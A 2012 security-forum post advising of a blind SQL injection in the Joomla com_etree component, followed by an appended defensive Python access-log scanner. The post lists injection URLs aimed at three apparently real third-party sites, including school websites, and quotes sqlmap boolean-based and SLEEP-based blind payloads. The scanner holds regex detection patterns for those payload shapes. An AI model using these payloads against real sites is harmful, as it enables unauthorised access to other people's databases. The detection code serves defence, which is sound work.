
20.02.2012, 16:06
Learner
Registered: 23.06.2008
Posts: 34
Time on forum: 98050
Reputation: 45
Joomla com_etree Blind SQL-inj Vuln
# Date: 20.02.2012
# Author: Mach1ne
Vulnerable parameter:
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
http://localhost/[PATH]/index.php?option=com_etree&view=displays&layout=category&id=[SQL]
PoC:
http://gradientshift.com/harrisonCounty/index.php?option=com_etree&view=displays&layout=category&id=6'+and+2=2
http://www.roberts.k12.mt.us/site/index.php?option=com_etree&view=displays&layout=category&id=7'+and+2=2
http://www.canyoncreekschool.org/?option=com_etree&view=displays&layout=user&user_id=5'+and+2=2
GET parameter 'user_id' is vulnerable.
---
Place: GET
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_etree&view=displays&layout=user&user_id=5' AND 425=425 AND 'PbgE'='PbgE
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: option=com_etree&view=displays&layout=user&user_id=5' AND SLEEP(5) AND 'bLot'='bLot
---
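For defenders, the two payload shapes quoted in the sqlmap output above (a quote followed by a boolean tautology, and a SLEEP() time probe in the com_etree user_id / id parameters) are easy to pick out of a web server access log. The following is an added example, not part of the post or of the com_etree component; the log lines and IP addresses are constructed, and the parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log: one benign com_etree request, the three
# probe shapes from the advisory, and one benign category request.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [20/Feb/2012:16:06:01 +0300] "GET /index.php?option=com_etree&view=displays&layout=user&user_id=5 HTTP/1.1" 200 5120
10.0.0.7 - - [20/Feb/2012:16:06:02 +0300] "GET /index.php?option=com_etree&view=displays&layout=user&user_id=5'+and+2=2 HTTP/1.1" 200 5120
10.0.0.7 - - [20/Feb/2012:16:06:03 +0300] "GET /index.php?option=com_etree&view=displays&layout=user&user_id=5'%20AND%20425=425%20AND%20'PbgE'='PbgE HTTP/1.1" 200 5120
10.0.0.7 - - [20/Feb/2012:16:06:09 +0300] "GET /index.php?option=com_etree&view=displays&layout=user&user_id=5'%20AND%20SLEEP(5)%20AND%20'bLot'='bLot HTTP/1.1" 200 5120
10.0.0.9 - - [20/Feb/2012:16:06:10 +0300] "GET /index.php?option=com_etree&view=displays&layout=category&id=6 HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/[\d.]+"'
)
# The two com_etree parameters named in the advisory.
WATCHED_PARAMS = ("user_id", "id")
# Quote, then AND/OR and a numeric comparison: the boolean-based blind shape.
BOOLEAN_RE = re.compile(r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)
# SLEEP(n) or BENCHMARK(: the MySQL time-based blind shape.
TIME_RE = re.compile(r"\bsleep\s*\(\s*\d+\s*\)|\bbenchmark\s*\(", re.I)


def classify_value(value):
    """Return 'time-blind', 'boolean-blind', or None for one decoded parameter value."""
    if TIME_RE.search(value):
        return "time-blind"
    if BOOLEAN_RE.search(value):
        return "boolean-blind"
    return None


def scan_access_log(text):
    """Return (ip, param, kind, decoded_value) for each com_etree request whose
    user_id / id value matches one of the blind SQL injection shapes."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes and turns '+' into spaces for us.
        qs = parse_qs(urlsplit(m.group("path")).query, keep_blank_values=True)
        if qs.get("option") != ["com_etree"]:
            continue
        for param in WATCHED_PARAMS:
            for value in qs.get(param, []):
                kind = classify_value(value)
                if kind:
                    hits.append((m.group("ip"), param, kind, value))
    return hits
```

Running scan_access_log(SAMPLE_ACCESS_LOG) flags the three probe requests from 10.0.0.7 and leaves the two plain numeric requests alone.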